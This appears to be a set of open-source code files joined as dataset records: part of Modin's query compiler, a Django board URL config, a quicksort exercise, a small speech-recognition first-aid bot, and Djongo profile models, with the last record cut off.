str_rindex(self, sub, start=0, end=None):\n return StrDefault.register(pandas.Series.str.rindex)(self, sub, start, end)\n\n @doc_utils.doc_str_method(\n refer_to=\"rjust\",\n params=\"\"\"\n width : int\n fillchar : str, default: ' '\"\"\",\n )\n def str_rjust(self, width, fillchar=\" \"):\n return StrDefault.register(pandas.Series.str.rjust)(self, width, fillchar)\n\n @doc_utils.doc_str_method(\n refer_to=\"rpartition\",\n params=\"\"\"\n sep : str, default: ' '\n expand : bool, default: True\"\"\",\n )\n def str_rpartition(self, sep=\" \", expand=True):\n return StrDefault.register(pandas.Series.str.rpartition)(self, sep, expand)\n\n @doc_utils.doc_str_method(\n refer_to=\"rsplit\",\n params=\"\"\"\n pat : str, optional\n n : int, default: -1\n expand : bool, default: False\"\"\",\n )\n def str_rsplit(self, pat=None, n=-1, expand=False):\n return StrDefault.register(pandas.Series.str.rsplit)(self, pat, n, expand)\n\n @doc_utils.doc_str_method(refer_to=\"rstrip\", params=\"to_strip : str, optional\")\n def str_rstrip(self, to_strip=None):\n return StrDefault.register(pandas.Series.str.rstrip)(self, to_strip)\n\n @doc_utils.doc_str_method(\n refer_to=\"slice\",\n params=\"\"\"\n start : int, optional\n stop : int, optional\n step : int, optional\"\"\",\n )\n def str_slice(self, start=None, stop=None, step=None):\n return StrDefault.register(pandas.Series.str.slice)(self, start, stop, step)\n\n @doc_utils.doc_str_method(\n refer_to=\"slice_replace\",\n params=\"\"\"\n start : int, optional\n stop : int, optional\n repl : str or callable, optional\"\"\",\n )\n def str_slice_replace(self, start=None, stop=None, repl=None):\n return StrDefault.register(pandas.Series.str.slice_replace)(\n self, start, stop, repl\n )\n\n @doc_utils.doc_str_method(\n refer_to=\"split\",\n params=\"\"\"\n pat : str, optional\n n : int, default: -1\n expand : bool, default: False\"\"\",\n )\n def str_split(self, pat=None, n=-1, expand=False):\n return StrDefault.register(pandas.Series.str.split)(self, pat, n, expand)\n\n @doc_utils.doc_str_method(\n refer_to=\"startswith\",\n params=\"\"\"\n pat : str\n na : object, default: np.NaN\"\"\",\n )\n def str_startswith(self, pat, na=np.NaN):\n return StrDefault.register(pandas.Series.str.startswith)(self, pat, na)\n\n @doc_utils.doc_str_method(refer_to=\"strip\", params=\"to_strip : str, optional\")\n def str_strip(self, to_strip=None):\n return StrDefault.register(pandas.Series.str.strip)(self, to_strip)\n\n @doc_utils.doc_str_method(refer_to=\"swapcase\", params=\"\")\n def str_swapcase(self):\n return StrDefault.register(pandas.Series.str.swapcase)(self)\n\n @doc_utils.doc_str_method(refer_to=\"title\", params=\"\")\n def str_title(self):\n return StrDefault.register(pandas.Series.str.title)(self)\n\n @doc_utils.doc_str_method(refer_to=\"translate\", params=\"table : dict\")\n def str_translate(self, table):\n return StrDefault.register(pandas.Series.str.translate)(self, table)\n\n @doc_utils.doc_str_method(refer_to=\"upper\", params=\"\")\n def str_upper(self):\n return StrDefault.register(pandas.Series.str.upper)(self)\n\n @doc_utils.doc_str_method(\n refer_to=\"wrap\",\n params=\"\"\"\n width : int\n **kwargs : dict\"\"\",\n )\n def str_wrap(self, width, **kwargs):\n return StrDefault.register(pandas.Series.str.wrap)(self, width, **kwargs)\n\n @doc_utils.doc_str_method(refer_to=\"zfill\", params=\"width : int\")\n def str_zfill(self, width):\n return StrDefault.register(pandas.Series.str.zfill)(self, width)\n\n # End of Str methods\n\n # Rolling methods\n\n # FIXME: most of the rolling/window methods take *args and **kwargs parameters\n # which are only needed for the compatibility with numpy, this behaviour is inherited\n # from the API level, we should get rid of it (Modin issue #3108).\n\n @doc_utils.doc_window_method(\n result=\"the result of passed functions\",\n action=\"apply specified functions\",\n refer_to=\"aggregate\",\n params=\"\"\"\n func : str, dict, callable(pandas.Series) -> scalar, or list of such\n *args : iterable\n **kwargs : dict\"\"\",\n build_rules=\"udf_aggregation\",\n )\n def rolling_aggregate(self, rolling_args, func, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.aggregate)(\n self, rolling_args, func, *args, **kwargs\n )\n\n # FIXME: at the query compiler method `rolling_apply` is an alias for `rolling_aggregate`,\n # one of these should be removed (Modin issue #3107).\n @doc_utils.add_deprecation_warning(replacement_method=\"rolling_aggregate\")\n @doc_utils.doc_window_method(\n result=\"the result of passed function\",\n action=\"apply specified function\",\n refer_to=\"apply\",\n params=\"\"\"\n func : callable(pandas.Series) -> scalar\n raw : bool, default: False\n engine : None, default: None\n This parameters serves the compatibility purpose. Always has to be None.\n engine_kwargs : None, default: None\n This parameters serves the compatibility purpose. Always has to be None.\n args : tuple, optional\n kwargs : dict, optional\"\"\",\n build_rules=\"udf_aggregation\",\n )\n def rolling_apply(\n self,\n rolling_args,\n func,\n raw=False,\n engine=None,\n engine_kwargs=None,\n args=None,\n kwargs=None,\n ):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.apply)(\n self, rolling_args, func, raw, engine, engine_kwargs, args, kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"correlation\",\n refer_to=\"corr\",\n params=\"\"\"\n other : modin.pandas.Series, modin.pandas.DataFrame, list-like, optional\n pairwise : bool, optional\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_corr(self, rolling_args, other=None, pairwise=None, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.corr)(\n self, rolling_args, other, pairwise, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(result=\"number of non-NA values\", refer_to=\"count\")\n def rolling_count(self, rolling_args):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.count)(\n self, rolling_args\n )\n\n @doc_utils.doc_window_method(\n result=\"covariance\",\n refer_to=\"cov\",\n params=\"\"\"\n other : modin.pandas.Series, modin.pandas.DataFrame, list-like, optional\n pairwise : bool, optional\n ddof : int, default: 1\n **kwargs : dict\"\"\",\n )\n def rolling_cov(self, rolling_args, other=None, pairwise=None, ddof=1, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.cov)(\n self, rolling_args, other, pairwise, ddof, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"unbiased kurtosis\", refer_to=\"kurt\", params=\"**kwargs : dict\"\n )\n def rolling_kurt(self, rolling_args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.kurt)(\n self, rolling_args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"maximum value\",\n refer_to=\"max\",\n params=\"\"\"\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_max(self, rolling_args, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.max)(\n self, rolling_args, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"mean value\",\n refer_to=\"mean\",\n params=\"\"\"\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_mean(self, rolling_args, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.mean)(\n self, rolling_args, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"median value\", refer_to=\"median\", params=\"**kwargs : dict\"\n )\n def rolling_median(self, rolling_args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.median)(\n self, rolling_args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"minimum value\",\n refer_to=\"min\",\n params=\"\"\"\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_min(self, rolling_args, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.min)(\n self, rolling_args, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"quantile\",\n refer_to=\"quantile\",\n params=\"\"\"\n quantile : float\n interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}, default: 'linear'\n **kwargs : dict\"\"\",\n )\n def rolling_quantile(\n self, rolling_args, quantile, interpolation=\"linear\", **kwargs\n ):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.quantile)(\n self, rolling_args, quantile, interpolation, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"unbiased skewness\", refer_to=\"skew\", params=\"**kwargs : dict\"\n )\n def rolling_skew(self, rolling_args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.skew)(\n self, rolling_args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"standart deviation\",\n refer_to=\"std\",\n params=\"\"\"\n ddof : int, default: 1\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_std(self, rolling_args, ddof=1, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.std)(\n self, rolling_args, ddof, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"sum\",\n refer_to=\"sum\",\n params=\"\"\"\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_sum(self, rolling_args, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.sum)(\n self, rolling_args, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n result=\"variance\",\n refer_to=\"var\",\n params=\"\"\"\n ddof : int, default: 1\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def rolling_var(self, rolling_args, ddof=1, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.rolling.Rolling.var)(\n self, rolling_args, ddof, *args, **kwargs\n )\n\n # End of Rolling methods\n\n # Window methods\n\n @doc_utils.doc_window_method(\n win_type=\"window of the specified type\",\n result=\"mean\",\n refer_to=\"mean\",\n params=\"\"\"\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def window_mean(self, window_args, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.Window.mean)(\n self, window_args, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n win_type=\"window of the specified type\",\n result=\"standart deviation\",\n refer_to=\"std\",\n params=\"\"\"\n ddof : int, default: 1\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def window_std(self, window_args, ddof=1, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.Window.std)(\n self, window_args, ddof, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n win_type=\"window of the specified type\",\n result=\"sum\",\n refer_to=\"sum\",\n params=\"\"\"\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def window_sum(self, window_args, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.Window.sum)(\n self, window_args, *args, **kwargs\n )\n\n @doc_utils.doc_window_method(\n win_type=\"window of the specified type\",\n result=\"variance\",\n refer_to=\"var\",\n params=\"\"\"\n ddof : int, default: 1\n *args : iterable\n **kwargs : dict\"\"\",\n )\n def window_var(self, window_args, ddof=1, *args, **kwargs):\n return RollingDefault.register(pandas.core.window.Window.var)(\n self, window_args, ddof, *args, **kwargs\n )\n\n # End of Window methods\n\n # Categories methods\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.cat.codes\")\n def cat_codes(self):\n \"\"\"\n Convert underlying categories data into its codes.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the integer codes of the underlying\n categories.\n \"\"\"\n return CatDefault.register(pandas.Series.cat.codes)(self)\n\n # End of Categories methods\n\n # DataFrame methods\n\n def invert(self):\n \"\"\"\n Apply bitwise invertion for each element of the QueryCompiler.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing bitwise invertion for each value.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.__invert__)(self)\n\n @doc_utils.doc_reduce_agg(\n method=\"mean absolute deviation\",\n params=\"\"\"\n axis : {0, 1}\n skipna : bool\n level : None, default: None\n Serves the compatibility purpose. Always has to be None.\"\"\",\n refer_to=\"mad\",\n )\n def mad(self, axis, skipna, level=None):\n return DataFrameDefault.register(pandas.DataFrame.mad)(\n self, axis=axis, skipna=skipna, level=level\n )\n\n @doc_utils.doc_reduce_agg(\n method=\"unbiased kurtosis\", refer_to=\"kurt\", extra_params=[\"skipna\", \"**kwargs\"]\n )\n def kurt(self, axis, level=None, numeric_only=None, skipna=True, **kwargs):\n return DataFrameDefault.register(pandas.DataFrame.kurt)(\n self, axis=axis, skipna=skipna, numeric_only=numeric_only, **kwargs\n )\n\n sum_min_count = sum\n prod_min_count = prod\n\n @doc_utils.add_refer_to(\"DataFrame.compare\")\n def compare(self, other, align_axis, keep_shape, keep_equal):\n \"\"\"\n Compare data of two QueryCompilers and highlight the difference.\n\n Parameters\n ----------\n other : BaseQueryCompiler\n Query compiler to compare with. Have to be the same shape and the same\n labeling as `self`.\n align_axis : {0, 1}\n keep_shape : bool\n keep_equal : bool\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the differences between `self` and passed\n query compiler.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.compare)(\n self,\n other=other,\n align_axis=align_axis,\n keep_shape=keep_shape,\n keep_equal=keep_equal,\n )\n\n # End of DataFrame methods\n","sub_path":"modin/backends/base/query_compiler.py","file_name":"query_compiler.py","file_ext":"py","file_size_in_byte":142354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"620608909","text":"from django.urls import path\nfrom . import views\n\napp_name = \"board\"\nurlpatterns=[\n path('', views.index, name=\"index\"),\n path('create', views.create, name=\"create\"),\n path('detail/', views.detail, name=\"detail\"),\n path('delete/', views.delete, name=\"delete\"),\n path('update/', views.update, name=\"update\"),\n path('up//', views.up, name=\"up\"),\n path('create_reply/', views.create_reply, name=\"create_reply\"),\n path('agree//', views.agree, name=\"agree\")\n\n]","sub_path":"board/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"276464061","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : 快速排序.py\n# @Time : 9/3/2018 10:36 AM\n# @Author : NusLuoKe\n\n'''\n设要排序的数组是A[0]……A[N-1],首先任意选取一个数据(通常选用数组的第一个数)作为关键数据,\n然后将所有比它小的数都放到它前面,所有比它大的数都放到它后面,这个过程称为一趟快速排序。\n\n一趟快速排序的算法是:\n1)设置两个变量i、j,排序开始的时候:i=0,j=N-1;\n2)以第一个数组元素作为关键数据,赋值给key,即key=A[0];\n3)从j开始向前搜索,即由后开始向前搜索(j--),找到第一个小于key的值A[j],将A[j]和A[i]互换;\n4)从i开始向后搜索,即由前开始向后搜索(i++),找到第一个大于key的A[i],将A[i]和A[j]互换;\n5)重复第3、4步,直到i=j; (3,4步中,没找到符合条件的值,即3中A[j]不小于key,4中A[i]不大于key的时候,\n 改变j、i的值,使得j=j-1,i=i+1,直至找到为止。找到符合条件的值,进行交换的时候i, j指针位置不变。\n 另外,i==j这一过程一定正好是i+或j-完成的时候,此时令循环结束)。\n'''\n\n\nclass Solution(object):\n def quick_sort(self, x):\n '''\n :param x: list object, list to be sorted.\n :return: sorted list\n '''\n\n if len(x) <= 1:\n return x\n\n i = 1\n j = len(x) - 1\n while i != j:\n base = x[0]\n if x[j] < base:\n if x[i] > base:\n x[i], x[j] = x[j], x[i]\n else:\n i += 1\n else:\n j -= 1\n\n x[j], x[0] = x[0], x[j]\n\n return self.quick_sort(x[:j]) + [x[j]] + self.quick_sort(x[j + 1:])\n\n def quick_sort_simple(self, x):\n if len(x) <= 1:\n return x\n\n less = []\n greater = []\n base = x[-1]\n for i in x:\n if i < base:\n less.append(i)\n elif i > base:\n greater.append(i)\n\n return self.quick_sort_simple(less) + [base] + self.quick_sort_simple(greater)\n\n\nif __name__ == '__main__':\n solution = Solution()\n the_input = [6, 1, 2, 7, 9, 3, 4, 5, 10, 8]\n print(solution.quick_sort(the_input))\n print(solution.quick_sort_simple(the_input))\n","sub_path":"done/快速排序.py","file_name":"快速排序.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"556216428","text":"import speech_recognition as sr\r\nimport pyttsx3 \r\nr=sr.Recognizer()\r\nwith sr.Microphone() as source:\r\n print(\"Hey There!\")\r\n print(\"Welcome to First Aid Bot\")\r\n print(\"Tell Us What Happened\")\r\n print(\"We Would be Really Happy To Help You\")\r\n audio=r.listen(source)\r\n print(\"Thanks! Processing in Process.....................\")\r\ndata=r.recognize_google(audio)\r\nif((\"hurt\" in data) or (\"damage\" in data) or (\"blood\" in data) or (\"bleeding\" in data)) :\r\n pyttsx3.speak(\"Don't worry you will be alright just follow below procedures\")\r\n print(\"You need a bandage and then you will be alright.\")\r\nelif(((\"attack\" in data) or (\"heart attack\" in data) or (\"heart pain\" in data))):\r\n pyttsx3.speak(\"Have the person sit down, rest, and try to keep calm. Loosen any tight clothing. Ask if the person takes any chest pain medicine, such as nitroglycerin, for a known heart condition, and help them take it.\")\r\n pyttsx3.speak(\"Don't worry you will be alright just follow below procedures\")\r\nelif(\"Thanks\" in data) or (\"Thank you\" in data):\r\n print(\"It's was our pleasure to help you!!\")\r\n pyttsx3.speak(\"Don't worry you will be alright just follow below procedures\")\r\n \r\nelse:\r\n pyttsx3.speak(\"Please contact your nearest doctor\")\r\n print(\"---------------------------------------\")\r\n \r\n print(\"---------------------------------------\")\r\n\r\n","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"10519666","text":"from djongo import models\nfrom django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom audit_log.models.fields import CreatingUserField, LastUserField\nfrom django.contrib.auth.models import User, Group\nfrom django.db.models.deletion import CASCADE\nfrom random import choices\nfrom master.models import (State,City,ClinicalSetting, HospitalMaster, ClinicalSetting, CaseCategory)\nfrom ckeditor.fields import RichTextField\nfrom django import forms\nfrom dal import autocomplete\n\n\n'''FINALIZED MODELS STARTS''' \n#Address Additional Profile using as embedded field in AdditionalProfile Model\nclass AddressAdditionalProfile(models.Model):\n address_line_1 = models.TextField(blank=True, null=True,verbose_name=_(\"Address Line 1\")) \n address_line_2 = models.TextField(blank=True, null=True,verbose_name=_(\"Address Line 2\"))\n pincode = models.BigIntegerField(blank=True, null=True, verbose_name=_(\"Pin Code\"))\n state = models.ForeignKey(State, blank=True, null=True, on_delete=models.CASCADE, verbose_name=_(\"State\"))\n city = models.ForeignKey(City, blank=True, null=True, on_delete=models.CASCADE, verbose_name=_(\"City\"))\n \n def __str__(self):\n return str(self.address_line_1)\n \n class Meta:\n abstract = True\n \nclass AddressAdditionalProfileForm(forms.ModelForm):\n address_line_1 = forms.CharField(label=_(\"Address Line1\"), max_length=300, widget=forms.Textarea(attrs={'class':'form-control','rows':'3', 'cols':'25', 'placeholder':_('Address Line1')})) \n address_line_2 = forms.CharField(label=_(\"Address Line2\"), max_length=300, widget=forms.Textarea(attrs={'class':'form-control','rows':'3', 'cols':'25', 'placeholder':_('Address Line2')})) \n pincode = forms.CharField(label=_('Pincode'),max_length='6', widget=forms.TextInput(attrs={'class':'form-control pincode', 'placeholder':_('Pincode')}))\n state=forms.ModelChoiceField(label=_(\"State\"),\n queryset=State.objects.all(),\n widget=autocomplete.ModelSelect2(url='user_profile:state-autocomplete' ,attrs={'class':'form-control', 'data-placeholder': 'State', 'data-minimum-input-length': 2})\n )\n city=forms.ModelChoiceField(label=_(\"City\"),\n queryset=City.objects.all(),\n widget=autocomplete.ModelSelect2(url='user_profile:city-autocomplete' ,attrs={'class':'form-control', 'data-placeholder': 'City', 'data-minimum-input-length': 2})\n )\n class Meta:\n model = AddressAdditionalProfile\n fields = (\n 'address_line_1', 'address_line_2','pincode','state','city'\n )\n\n#Profile Info Additional Profile using as embedded field in AdditionalProfile Model\nclass ProfileInfoAdditionalProfile(models.Model):\n Profile_dis_CHOICE = ( \n (u'0', u'No'),\n (u'1', u'Opt for Disable'),\n )\n profile_approved_datetime = models.DateTimeField(blank=True, null=True, verbose_name=(\"Profile Approved Date Time\"))\n profile_approved_remarks = models.TextField(blank=True, null=True,verbose_name=_(\"Profile Approved Remarks\")) \n profile_dis_opt_by_status = models.CharField(max_length=1, default='0',choices=Profile_dis_CHOICE, verbose_name=_(\"Profile Disabled Opt By Status\"))\n profile_dis_opt_by_remarks = models.TextField(blank=True, null=True,verbose_name=_(\"Profile Disabled Opt By Remarks\")) \n profile_dis_opt_by_datetime = models.DateTimeField(blank=True, null=True, verbose_name=(\" Profile Disabled Opt By Date Time\"))\n profile_dis_by_remarks = models.TextField(blank=True, null=True,verbose_name=_(\"Profile Disabled By Remarks\")) \n profile_dis_by_datetime = models.DateTimeField(blank=True, null=True, verbose_name=(\" Profile Disabled By Date Time\"))\n profile_approved_by = models.ForeignKey(User, blank=True, null=True, on_delete=models.CASCADE, verbose_name=_(\"Profile Approved By\"), related_name = \"ProfileApprovedBy\")\n profile_dis_by= models.ForeignKey(User, blank=True, null=True, on_delete=models.CASCADE, verbose_name=_(\"Profile Disabled By\"), related_name = \"ProfiledisBy\")\n\n def __str__(self):\n return str(self.profile_approved_remarks)\n \n class Meta:\n abstract = True\n \nclass ProfileInfoAdditionalProfileForm(forms.ModelForm):\n class Meta:\n model = ProfileInfoAdditionalProfile\n fields = (\n 'profile_approved_datetime', 'profile_approved_remarks','profile_dis_opt_by_status',\n 'profile_dis_opt_by_remarks','profile_dis_opt_by_datetime','profile_dis_by_remarks',\n 'profile_dis_by_datetime','profile_approved_by','profile_dis_by'\n )\n \n#Additional Profile Model\nclass AdditionalProfile(models.Model):\n _id = models.ObjectIdField()\n user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=_(\"User\"))\n photo = models.ImageField(upload_to='Profile_image/', default='', blank=True, null=True, verbose_name=\"Profile Photo\")\n mobile_no = models.BigIntegerField( verbose_name=_(\"Mobile Number\"))\n addt_mobile_no = models.BigIntegerField(blank=True, null=True, verbose_name=_(\"Additional Mobile Number\"))\n address = models.EmbeddedField(\n model_container=AddressAdditionalProfile,\n model_form_class=AddressAdditionalProfileForm,\n )\n profile_info = models.EmbeddedField(\n model_container=ProfileInfoAdditionalProfile,\n model_form_class=ProfileInfoAdditionalProfileForm,\n )\n profile_status = models.CharField(max_length=100, blank=True, null=True, verbose_name=_(\" Profile Status\"))\n \n def __str__(self):\n return self.user.username+' '+self.user.email\n \n class Meta:\n verbose_name = \"Additional Profile\"\n verbose_name_plural = \"Additional Profile\"\n db_table = 'ccrh_user_addtional_profile'\n#Additional Profile Table Ends here\n\n#Creating model for Practical Details Table Starts here\n#when saving the upload path with the name starts here\ndef registartion_document_path_name(instance, filename):\n dir_name = instance.user.username \n return 'Certification Upload/%s/%s' % (dir_name, filename)\n\n#DocumentUploadPractDetails using as Array Field in PractDetails Model\nclass DocumentUploadPractDetails(models.Model):\n document_name = models.CharField(max_length=100, null=True, blank=True, verbose_name=_(\"Document Name\"))\n document_path = models.FileField(upload_to=registartion_document_path_name, null=True, blank=True)\n \n def __str__(self):\n return self.document_name\n \n class Meta:\n abstract = True\n\nclass DocumentUploadPractDetailsForm(forms.ModelForm):\n document_name = forms.CharField(label=_(\"Document Name\"), max_length=300, widget=forms.TextInput(attrs={'class':'form-control', 'placeholder':_('Document Name')})) \n document_path = forms.FileField(label=_(\"Registration Certificate\"), widget=forms.FileInput(attrs={'class':'form-control'})) \n\n class Meta:\n model = DocumentUploadPractDetails \n fields = (\n 'document_name','document_path'\n )\n \n#CsPractDetails using as Array Field in PractDetails Model\nclass CsPractDetails(models.Model):\n cs = models.ForeignKey(ClinicalSetting, on_delete=models.CASCADE, verbose_name=_(\"Type Of Clinical Setting\"))\n clinic_name = models.CharField(max_length=250, verbose_name=_(\"Clinical name\"))\n clinic_id = models.CharField(max_length=250, verbose_name=_(\"Clinical id\"))\n clinic_address_1 = models.TextField(verbose_name=_(\"Clinical Address 1\"))\n clinic_address_2 = models.TextField(verbose_name=_(\"Clinical Address 2\"))\n city = models.ForeignKey(City, on_delete=models.CASCADE, verbose_name=_(\"City\"))\n state = models.ForeignKey(State, on_delete=models.CASCADE, verbose_name=_(\"State\"))\n pincode = models.BigIntegerField(blank=True, null=True, verbose_name=_(\"Pin Code\"))\n affiliation = models.CharField(blank=True, null=True, max_length=100, verbose_name=_(\"Affiliation\"))\n \n def __str__(self):\n return self.clinic_name\n \n class Meta:\n abstract = True\n\n\nclass CsPractDetailsForm(forms.ModelForm):\n cs = forms.ModelChoiceField(required=True,queryset=ClinicalSetting.objects.all(), empty_label=\"Select Type Of Clinical\", label=_(\"Type Of Clinical Settings\"), widget=forms.Select(attrs={'class':'form-control type_of_clinical'}))\n clinic_name = forms.CharField(required=True, label=_(\"Clinic / Hospital Name\"), widget=forms.TextInput(attrs={'class':'form-control clinical_name','placeholder':_('Please enter 2 or more characters')}))\n clinic_id = forms.CharField(required=True, label=\"Clinical ID\", max_length=300, widget=forms.TextInput(attrs={'class':'form-control', 'placeholder':_('Clinical ID')})) \n clinic_address_1 = forms.CharField(required=True, label=\"Clinical/Hospital Address 1\", max_length=300, widget=forms.Textarea(attrs={'class':'form-control address_1','rows':'3', 'cols':'25', 'placeholder':_('Clinical/Hospital Address 1')})) \n clinic_address_2 = forms.CharField(required=True, label=\"Clinical/Hospital Address 2\", max_length=300, widget=forms.Textarea(attrs={'class':'form-control adress_2','rows':'3', 'cols':'25', 'placeholder':_('Clinical/Hospital Address 2')})) \n state = forms.ModelChoiceField(required=True, queryset=State.objects.all(), empty_label=\"Select State\", label=_(\"State\"), widget=forms.Select(attrs={'class':'form-control state','id':'state_id'}))\n city = forms.ModelChoiceField(required=True, queryset=City.objects.all(), empty_label=\"Select City\", label=_(\"City\"), widget=forms.Select(attrs={'class':'form-control city'}))\n pincode = forms.CharField(required=True, label='Pincode',max_length='6', widget=forms.TextInput(attrs={'class':'form-control pincode'}))\n affiliation = forms.CharField(required=False, label='Affiliation',max_length='100', widget=forms.TextInput(attrs={'class':'form-control affiliation', 'placeholder':_('Affiliation')}))\n\n class Meta:\n model = CsPractDetails\n fields = (\n 'cs','clinic_name','clinic_id','clinic_address_1' ,'clinic_address_2','city','state','pincode','affiliation',\n )\n \nclass PractDetails(models.Model):\n _id = models.ObjectIdField()\n user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=_(\"User\"))\n pract_regis_body = models.CharField(max_length=10, verbose_name=_(\"Registration Body\"))\n pract_reg_no = models.CharField(max_length=50, verbose_name=_(\"Registration Number\"))\n pract_state = models.ForeignKey(State, blank=True, null=True, on_delete=models.CASCADE, verbose_name=_(\"State\"))\n document_name = models.CharField(max_length=100, null=True, blank=True, verbose_name=_(\"Document Name\"))\n document_path = models.FileField(upload_to=registartion_document_path_name, verbose_name=_(\"Registration Document\"), null=True, blank=True)\n\n clinical_setting = models.ArrayField(\n model_container=CsPractDetails,\n model_form_class=CsPractDetailsForm,\n )\n tnc = models.BooleanField(default=False, verbose_name=_(\"Terms & Conditions\"))\n objects = models.DjongoManager()\n\n \n def __str__(self):\n return self.user.username\n \n class Meta:\n verbose_name = \"Practitioner Details\"\n verbose_name_plural = \"Practitioner Details\"\n db_table = 'ccrh_pract_details'\n#Creating model for Practical Details Table Ends here\n\n#Panel User Group Mapping Model Starts here\nclass Category(models.Model):\n category = models.ForeignKey(CaseCategory, on_delete=models.CASCADE, verbose_name=_(\"Category\"))\n\n def __str__(self):\n return self.category.category_name\n \n class Meta:\n abstract = True\n\nclass SupervisorPool(models.Model):\n supervisor = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=_(\"Supervisor\"))\n \n def __str__(self):\n return self.supervisor.username\n \n class Meta:\n abstract = True\n \nclass ReviewerPool(models.Model):\n reviewer = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=_(\"Reviewer\"))\n \n def __str__(self):\n return self.reviewer.username\n \n class Meta:\n abstract = True\n \nclass PanelUserGroupMapping(models.Model):\n _id = models.ObjectIdField()\n panel_name = models.CharField(max_length=100, verbose_name=_(\"Panel Name\"))\n category = models.ArrayField(\n model_container=Category,\n )\n supervisor_pool = models.ArrayField(\n model_container=SupervisorPool,\n )\n reviewer_pool = models.ArrayField(\n model_container=ReviewerPool,\n )\n\n def __str__(self):\n return self.panel_name\n \n class Meta:\n verbose_name = \"Panel User Group Mapping\"\n verbose_name_plural = \"Panel User Group Mapping\"\n db_table = 'ccrh_panel_user_group_mapping'\n#Panel User Group Mapping Model Ends here \n\n# #Visitor History Model Starts here\n# class VisitorHistory(models.Model):\n# _id = models.ObjectIdField()\n# IS_ACCESSED_CHOICE = (\n# (u'0', u'No'),\n# (u'1', u'Yes'),\n# )\n# visitor_name = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=_(\"Visitor Name\"))\n# visitor_email = models.CharField(max_length=100, verbose_name=_(\"Visitor Email\"))\n# visitor_mobile = models.BigIntegerField(verbose_name=_(\"Visitor Mobile Number \")) \n# visitor_datetime = models.DateTimeField( verbose_name=_(\"Visitor Date Time\"))\n# visitor_link_unique_code = models.CharField(max_length=100, verbose_name=_(\"Visitor Link Unique Code\"))\n# visitor_link_expiry_datetime = models.DateTimeField( verbose_name=_(\"Visitor Link Expiry Date Time\"))\n# is_accessed = models.CharField(max_length=1, default='0',choices=IS_ACCESSED_CHOICE, verbose_name=_(\"Is Accessed\"))\n# accessed_datetime = models.DateTimeField( verbose_name=_(\"Accessed Date Time\"))\n# \n# class Meta:\n# verbose_name = \"Visitor History\"\n# verbose_name_plural = \"Visitor History\"\n# db_table = 'ccrh_vistor_history'\n# #Visitor History Model Ends here\n'''FINALIZED MODELS ENDS''' ","sub_path":"user_profile/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"470633724","text":"import re\r\nimport os\r\nimport sys\r\nimport json\r\nimport numpy as np\r\nfrom sklearn.preprocessing import 